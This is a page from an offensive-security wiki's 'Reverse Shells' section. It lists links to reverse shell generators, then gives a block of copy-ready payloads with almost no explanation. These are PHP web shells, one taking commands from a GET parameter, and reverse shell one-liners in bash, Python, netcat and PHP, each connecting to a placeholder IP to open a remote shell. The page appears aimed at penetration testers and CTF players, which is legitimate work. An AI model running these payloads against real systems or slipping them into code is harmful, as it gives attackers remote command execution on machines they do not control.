Red Squad
Ctrlk
BuyMeACoffee
  • 🏠/home/red-squad
  • 🌐Web Hacking
    • 🚩CTFs shortcuts
    • πŸ—ΊοΈAudits plan
    • πŸ•΅οΈOSINT
    • Enumeration
    • πŸ”—HTTP Stuff
    • πŸ”Sessions / Tokens
    • πŸ’‰Injections
    • πŸͺ±Web Vulnerabilities
    • β›”WAF Bypass
    • ✍️Servers / CMS
    • πŸ–‡οΈAPI
  • 🐧Linux Hacking
    • πŸ§—Privilege Escalation
    • πŸ‘£Cover tracks
    • πŸšͺBackdoors
    • β­•Reverse Shells
      • Shell Stabilizing
      • PwnCat
      • Ping-Pong
    • πŸ”’Compiled Binaries
    • 🌊Buffer Overflow
    • 🐳Docker Escape
    • 🀝File sharing
  • πŸͺŸWindows Hacking
    • πŸ‘₯Active Directory
    • πŸ’‘Useful AD Commands
    • πŸ§—Privilege Escalation
    • 🐚Shells
    • πŸ”“Bypasses
    • πŸ“ƒOffice
    • πŸ‘©β€πŸ’»SCCM | MECM
    • πŸ’ŽMicrosoft 365
  • πŸ’½Systems
    • πŸ•β€πŸ¦ΊServices Enumeration
    • πŸ–¨οΈPrinters
    • πŸ›‘οΈFortinet
    • πŸ“ΉCCTV / IP Cameras
  • πŸŽ†Networks
    • πŸŒͺ️Pivoting
    • πŸ”₯Firewalls
    • πŸ”—Proxies
  • πŸ“±Mobile Hacking
    • πŸ€–Android
    • 🍏iOS
    • πŸ“ΊIOT
  • Configuration
    • ChromeOS
    • Mobile
    • IBM
  • πŸ“‘Wireless Hacking
    • πŸŽ†Wi-Fi Attacks
    • 🫐Bluetooth
  • πŸ‘¨β€πŸ’»Code Audit
    • βœ”οΈBest Practices
    • ❌Bad Practices
    • βš’οΈTools
  • πŸ‘Thick Client Hacking
    • πŸ“Thick Client Pentesting Methodology
    • πŸ—„οΈResources
  • πŸ—„οΈMISC
    • πŸ”‘Default Credentials
    • πŸ”»CVEs
    • 🦊Browser Extensions
    • πŸ€–AI
    • πŸ”­Hacking Labs
    • πŸ”«Exploitation Frameworks
  • πŸ•΅οΈOPSEC
    • πŸ—οΈPrivacy
  • πŸ”‘CRACKING | ENCODING
    • πŸ₯ŠBruteforce tools
    • πŸ“Wordlists
    • 🧨Cracking Tools
    • πŸ”¬Encoding | Decoding Tools
    • πŸ”Steganography | Cipher
  • πŸ”΄RED TEAM
    • πŸ“₯Password Extract
    • πŸ•΅οΈSpy cam
    • πŸ”’Lock Picking
    • 🎣Phishing
  • πŸŒ€Whistle Blowing
    • πŸ“ΉCCTV
  • πŸ”΅BLUE TEAM
    • 🧩Forensics
    • 🦹Malware Analysis
    • πŸ› οΈTools
    • 🍯HoneyPots
    • πŸŽ†Networks Security
    • πŸͺ™Online IoC Scanners
  • 🐞Bug Bounty Related
    • Searching for CVEs
    • [FR] Legal
    • Dorks
  • πŸ–₯️DEVELOPERS
    • πŸ‘¨β€πŸ’»IDE
  • πŸ“šLEARNING
    • Windows
    • SQL
    • SSL/TLS
Powered by GitBook
On this page
Edit
  1. 🐧Linux Hacking

β­•Reverse Shells

List

LogoPayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master Β· swisskyrepo/PayloadsAllTheThingsGitHub
Reverse Shell List

Reverse Shell Online Generators

Host locally :

LogoGitHub - 0dayCTF/reverse-shell-generator: Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)GitHub
LogoOnline - Reverse Shell Generatorwww.revshells.com
Reverse Shell Cheat Sheetpentestmonkey

PHP Payloads

Bash TCP

Python

Netcat

PHP

PreviousBackdoorsNextShell Stabilizing

Last updated 2 years ago

Was this helpful?

  • List
  • Reverse Shell Online Generators

Was this helpful?

<?php phpinfo(); ?>
<?php system('id'); ?>
<?php system($_GET[β€˜cmd’]); ?> //in user-agent
bash -i >& /dev/tcp/0.0.0.0/8899 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'